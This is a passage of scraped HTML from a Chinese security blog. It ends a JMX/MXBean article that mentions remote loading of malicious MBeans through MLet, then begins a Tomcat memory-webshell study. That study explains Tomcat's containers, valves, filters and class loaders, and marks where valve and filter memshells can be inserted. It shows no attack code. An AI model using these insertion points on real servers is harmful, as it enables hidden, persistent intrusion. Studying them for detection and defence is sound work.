204);"><th style="text-align: center;border-top-width: 1px;border-color: rgb(204, 204, 204);background-color: rgb(240, 240, 240);">资源接口</th><th style="text-align: center;border-top-width: 1px;border-color: rgb(204, 204, 204);background-color: rgb(240, 240, 240);">管理的资源</th><th style="text-align: center;border-top-width: 1px;border-color: rgb(204, 204, 204);background-color: rgb(240, 240, 240);">Object Name</th><th style="text-align: center;border-top-width: 1px;border-color: rgb(204, 204, 204);background-color: rgb(240, 240, 240);">VM 中的实例个数</th></tr></thead><tbody style="border-width: 0px;border-style: initial;border-color: initial;"><tr style="border-width: 1px 0px 0px;border-right-style: initial;border-bottom-style: initial;border-left-style: initial;border-right-color: initial;border-bottom-color: initial;border-left-color: initial;border-top-style: solid;border-top-color: rgb(204, 204, 204);"><td style="border-color: rgb(204, 204, 204);text-align: center;">ClassLoadingMXBean</td><td style="border-color: rgb(204, 204, 204);text-align: center;">类加载</td><td style="border-color: rgb(204, 204, 204);text-align: center;">java.lang:type= ClassLoading</td><td style="border-color: rgb(204, 204, 204);text-align: center;">1 个</td></tr><tr style="border-width: 1px 0px 0px;border-right-style: initial;border-bottom-style: initial;border-left-style: initial;border-right-color: initial;border-bottom-color: initial;border-left-color: initial;border-top-style: solid;border-top-color: rgb(204, 204, 204);background-color: rgb(248, 248, 248);"><td style="border-color: rgb(204, 204, 204);text-align: center;">CompilationMXBean</td><td style="border-color: rgb(204, 204, 204);text-align: center;">汇编系统</td><td style="border-color: rgb(204, 204, 204);text-align: center;">java.lang:type= Compilation</td><td style="border-color: rgb(204, 204, 204);text-align: center;">0 个或 1 个</td></tr><tr style="border-width: 1px 0px 0px;border-right-style: initial;border-bottom-style: initial;border-left-style: initial;border-right-color: initial;border-bottom-color: initial;border-left-color: initial;border-top-style: solid;border-top-color: rgb(204, 204, 204);"><td style="border-color: rgb(204, 204, 204);text-align: center;">GarbageCollectorMXBean</td><td style="border-color: rgb(204, 204, 204);text-align: center;">垃圾收集</td><td style="border-color: rgb(204, 204, 204);text-align: center;">java.lang:type= GarbageCollector, name=collectorName</td><td style="border-color: rgb(204, 204, 204);text-align: center;">1 个或更多</td></tr><tr style="border-width: 1px 0px 0px;border-right-style: initial;border-bottom-style: initial;border-left-style: initial;border-right-color: initial;border-bottom-color: initial;border-left-color: initial;border-top-style: solid;border-top-color: rgb(204, 204, 204);background-color: rgb(248, 248, 248);"><td style="border-color: rgb(204, 204, 204);text-align: center;">LoggingMXBean</td><td style="border-color: rgb(204, 204, 204);text-align: center;">日志系统</td><td style="border-color: rgb(204, 204, 204);text-align: center;">java.util.logging:type =Logging</td><td style="border-color: rgb(204, 204, 204);text-align: center;">1 个</td></tr><tr style="border-width: 1px 0px 0px;border-right-style: initial;border-bottom-style: initial;border-left-style: initial;border-right-color: initial;border-bottom-color: initial;border-left-color: initial;border-top-style: solid;border-top-color: rgb(204, 204, 204);"><td style="border-color: rgb(204, 204, 204);text-align: center;">MemoryManagerMXBean</td><td style="border-color: rgb(204, 204, 204);text-align: center;">内存池</td><td style="border-color: rgb(204, 204, 204);text-align: center;">java.lang: typeMemoryManager, name=managerName</td><td style="border-color: rgb(204, 204, 204);text-align: center;">1 个或更多</td></tr><tr style="border-width: 1px 0px 0px;border-right-style: initial;border-bottom-style: initial;border-left-style: initial;border-right-color: initial;border-bottom-color: initial;border-left-color: initial;border-top-style: solid;border-top-color: rgb(204, 204, 204);background-color: rgb(248, 248, 248);"><td style="border-color: rgb(204, 204, 204);text-align: center;">MemoryPoolMXBean</td><td style="border-color: rgb(204, 204, 204);text-align: center;">内存</td><td style="border-color: rgb(204, 204, 204);text-align: center;">java.lang: type= MemoryPool, name=poolName</td><td style="border-color: rgb(204, 204, 204);text-align: center;">1 个或更多</td></tr><tr style="border-width: 1px 0px 0px;border-right-style: initial;border-bottom-style: initial;border-left-style: initial;border-right-color: initial;border-bottom-color: initial;border-left-color: initial;border-top-style: solid;border-top-color: rgb(204, 204, 204);"><td style="border-color: rgb(204, 204, 204);text-align: center;">MemoryMXBean</td><td style="border-color: rgb(204, 204, 204);text-align: center;">内存系统</td><td style="border-color: rgb(204, 204, 204);text-align: center;">java.lang:type= Memory</td><td style="border-color: rgb(204, 204, 204);text-align: center;">1 个</td></tr><tr style="border-width: 1px 0px 0px;border-right-style: initial;border-bottom-style: initial;border-left-style: initial;border-right-color: initial;border-bottom-color: initial;border-left-color: initial;border-top-style: solid;border-top-color: rgb(204, 204, 204);background-color: rgb(248, 248, 248);"><td style="border-color: rgb(204, 204, 204);text-align: center;">OperatingSystemMXBean</td><td style="border-color: rgb(204, 204, 204);text-align: center;">操作系统</td><td style="border-color: rgb(204, 204, 204);text-align: center;">java.lang:type= OperatingSystem</td><td style="border-color: rgb(204, 204, 204);text-align: center;">1 个</td></tr><tr style="border-width: 1px 0px 0px;border-right-style: initial;border-bottom-style: initial;border-left-style: initial;border-right-color: initial;border-bottom-color: initial;border-left-color: initial;border-top-style: solid;border-top-color: rgb(204, 204, 204);"><td style="border-color: rgb(204, 204, 204);text-align: center;">RuntimeMXBean</td><td style="border-color: rgb(204, 204, 204);text-align: center;">运行时系统</td><td style="border-color: rgb(204, 204, 204);text-align: center;">java.lang:type= Runtime</td><td style="border-color: rgb(204, 204, 204);text-align: center;">1 个</td></tr><tr style="border-width: 1px 0px 0px;border-right-style: initial;border-bottom-style: initial;border-left-style: initial;border-right-color: initial;border-bottom-color: initial;border-left-color: initial;border-top-style: solid;border-top-color: rgb(204, 204, 204);background-color: rgb(248, 248, 248);"><td style="border-color: rgb(204, 204, 204);text-align: center;">ThreadMXBean</td><td style="border-color: rgb(204, 204, 204);text-align: center;">线程系统</td><td style="border-color: rgb(204, 204, 204);text-align: center;">java.lang:type= Threading</td><td style="border-color: rgb(204, 204, 204);text-align: center;">1 个</td></tr></tbody></table><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">zabbix和jconsole都是通过jmx进行性能监控</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">特殊的MBean是MLet，可以通过getMBeanFromURL远程加载恶意Mbean</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">漏洞利用方式如下</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><a href="https://www.cnblogs.com/0x28/p/15685164.html" target="_blank">https://www.cnblogs.com/0x28/p/15685164.html</a></p><p><mpcps class="js_editor_new_cps" data-templateid="card" data-traceid="0ef9ec57-9f3a-4886-8398-496ed3e3577e" data-goodssouce="1" data-pid="100_443058449323" data-appuin="3529291389" data-buffer="{"category_id":4,"pid":"100_443058449323","biz_uin":"3529291389","trace_id":"0ef9ec57-9f3a-4886-8398-496ed3e3577e","sku_id":"100_443058449323","source_id":3,"source_name":"拼多多","audit_state":1,"main_img":"https://pcm-img.zhls.qq.com/productcenter-1c3ab695--1018825-993013803218295185/51911590715052023/e3263dfd7d00a0d36b8fc92add1e61c8.jpg","product_name":"浅香洗发水日本氨基酸控油去屑蓬松洗发露去油沐浴露护发素三件套","current_price":6900,"first_category_id":"4","discount":"3500","product_label_name_list":["包邮"],"select_tag_name_list":[],"templateId":"card","appuin":"3529291389","isNewCpsKOL":1}"></mpcps></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>
<p></p>



<p><a href="2247483917">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=03f9b4f6&r=1&u=http%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyOTI5MTM4OQ%3D%3D%26mid%3D2247483917%26idx%3D1%26sn%3Df7cac693d426d95e83f6ffd178c16722">跳转微信打开</a></p>

</article>
<article>
<h1>[下班充电计划]tomcat_memshell</h1>
<p>Thu, 06 Jul 2023 00:04:00 +0800</p>
<p>
<span>鲁平</span> <span>2023-07-06 00:04</span> <span style="display: inline-block;">北京</span>
</p>

<p>Tomcathttps://segmentfault.com/u/wangzeming###</p>
<p></p>



<p>

</p>


<p style=""><span style="mso-bookmark:tomcat-1;"><span style="font-family:Calibri;">Tomcat</span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style=""><a href="https://segmentfault.com/u/wangzeming###" target="_blank">https://segmentfault.com/u/wangzeming###</a></span></span><span style="mso-bookmark:tomcat-1;"><span style="font-family:Cambria;">            </span></span><span style="mso-bookmark:tomcat-1;"><span style="">tomcat\spring\java内省基础看这里，这个作者文章很全</span></span><span style="mso-bookmark:tomcat-1;"><span style="font-family:Cambria;">            

            </span></span><span style="mso-bookmark:tomcat-1;"><span style=""><a href="https://pdai.tech/" target="_blank">https://pdai.tech/</a></span></span><span style="mso-bookmark:tomcat-1;"><span style="font-family:Cambria;">            </span></span><span style="mso-bookmark:tomcat-1;"><span style="">java全栈文章在这里，作者为爱发电</span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="font-family:Cambria;">Tomcat 是 Web 应用服务器，是一个 Servlet/JSP 容器。</span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="font-family:Cambria;">Servlet容器也叫做Servlet引擎，是Web服务器或应用程序服务器的一部分，用于在发送的请求和响应之上提供网络服务，解码基于 MIME的请求，格式化基于MIME的响应</span></span></p><p style=""><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Calibri;">tomcat容器</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">Tomcat中有四种类型的Servlet容器，从上到下分别是 Engine、Host、Context、Wrapper，这四个容器之间是父子关系</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 72.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">–</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">Tomcat中的四种容器都继承自Container接口，其中Engin容器全局只有一个，是Container对外提供处理Request和Response的入口。Engin容器的BaseValve是</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="">StandardEngineValve</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">，这个Valve会读取Request中的Host信息，然后把请求路由给对应的Host容器。</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 72.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">–</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">Host容器是Engin容器的子容器，一个Engin容器可以包含多个Host容器，每个Host容器代表一个虚拟主机</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 108.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">PipeLine：用于流式加工处理请求中的信息，每个PipeLine中可以包含多个阀门Valve，每个Valve都有同样的方法</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="">invoke(Request request,Response response)</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">。</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 108.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">BaseValve：基础阀门，和Piple中的阀门的接口相同方法：</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="">invoke(Request request,Response response)</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">，但是作用和Piple中的阀门不同，主要用于将请求传递到下一个容器或者对应的Servlet组件。</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 72.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;"> </span><a href="https://mp.weixin.qq.com/s?__biz=MzI5Nzc0OTkxOQ==&mid=2247483666&idx=1&sn=6421b39037735953fa3148bdbf5bf912&scene=21#wechat_redirect" data-linktype="2"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-size:12.0pt;font-family:Cambria;font-weight:bold;text-underline:none;text-decoration:none;">https://mp.weixin.qq.com/s/x4pxmeqC1DvRi9AdxZ-0Lw</span></span></span></a><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;font-weight:bold;"> 2017年n1nty师傅在这里提到插入自定义valve实现内存马</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 108.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">在一个tomcat里面同时支持三个域名，需要在server.xml文件里面的Engine标签下面添加多个Host标签，name表示域名，appbase表示虚拟主机的目录</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 72.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">–</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">一个Host容器可以包含多个Context容器，通常情况下一个Context容器标识一个应用，对应于wabapp目录下面的一个工程</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 72.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">–</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">一个Context容器又可以包含多个Wrapper容器：每个Wrapper容器包含一个Servlet容器，意味着Tomcat允许一个应用有多个servlet实现。Wrapper容器是最小的容器，每个Wrapper都可以对应一个Servlet的实例。</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 108.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">当请求转发到Wrapper容器之后，wrapper容器在调用Pipeline方法之后，会使用特定的类加载器去加载servlet类，对servlet进行实例化和初始化，然后将请求交给servelt的service方法进行处理</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 108.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;"> </span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="">java类加载的双亲委派机制</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="">java中的类加载默认是采用双亲委派模型，即加载一个类时，首先判断自身define加载器有没有加载过此类，如果加载了直接获取class对象，如果没有查到，则交给加载器的父类加载器去重复上面过程</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 108.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;"> </span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">              </span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 108.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">Wrapper容器的基本阀门StandardWrapperValve还会在调用servelt容器之前调用用户配置的过滤器链Filter。</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 72.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;"> </span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;font-weight:bold;">此处插入filter内存马</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 108.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">应用程序中的servlet只能引用部署在WEB-INF/classes目录及其子目录下的类。但是，servlet类不能访问其它路径中的类，即使这些累包含在运行当前Tomcat的JVM的CLASSPATH环境变量中</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 108.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">servlet类只能访问WEB-INF/LIB目录下的库，其它目录的类库均不能访问</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 72.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">–</span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">              <shape type="#_x0000_t75" filled="f" style="text-indent:0;left:0;width:420.0pt;height:516.7058pt;"><imagedata title="rId21"></imagedata></shape></span></span></span></p><p style=""><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat容器;"><span style="font-family:Cambria;">              </span></span></span></p><p style=""><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Calibri;">tomcat类加载器</span></span></span></p><p style=""><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">Tomcat中的载入器值得是Web应用程序载入器，而不仅仅是类载入器，载入器必须实现Loader接口</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="">public interface Loader {</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>public void backgroundProcess();</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>当Context容器开启了Reload功能并且仓库变更的情况下，Loaders会先把类加载器设置为Web类加载器，重启Context容器。重启Context容器会重启所有的子Wrapper容器，会销毁并重新创建servlet类的实例，从而达到动态加载servlet类的目的</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>public ClassLoader getClassLoader();</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>默认的类加载器的实现有两种种：ParallelWebappClassLoader和WebappClassLoader。默认情况下使用ParallelWebappClassLoader作为类加载器</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>+ WebappClassLoader会缓存之前已经载入的类来提升性能，还会缓存加载失败的类的名字存放ResourceEntry类实例中，若失败，当再次请求加载同一个类的时候，类加载器就会直接抛出ClassNotFindException异常，而不是再次去查找这个类</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>1. 因为所有已经载入的类都会缓存起来，所以载入类的时候要先检查本地缓存。</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>2. 若本地缓存没有，则检查父类加载器的缓存，调用ClassLoader接口的findLoadedClass()方法。</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>3. 若两个缓存总都没有，则使用系统类加载器进行加载，防止Web应用程序中的类覆盖J2EE中的类。</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>4. 若启用了SecurityManager，则检查是否允许载入该类。若该类是禁止载入的类，抛出ClassNotFoundException异常。</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>5. 若打开了标志位delegate，或者待载入的在类不能用web类加载器加载的类，则使用父类加载器来加载器来加载相关类。如果父类加载器为null，则使用系统类加载器。</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>6. 从当前仓库载入类。</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>7. 当前仓库没有需要载入的类，而且delegate关闭，则是用父类载入器来载入相关的类。</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>8. 若没有找到需要加载的类，则抛出ClassNotFindException。</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>public Context getContext();</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>public void setContext(Context context);</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span>用来将载入器和某个servlet容器关联</span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style=""><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:tomcat-1;"><span style="mso-bookmark:tomcat类加载器;"><span style="font-family:Cambria;">              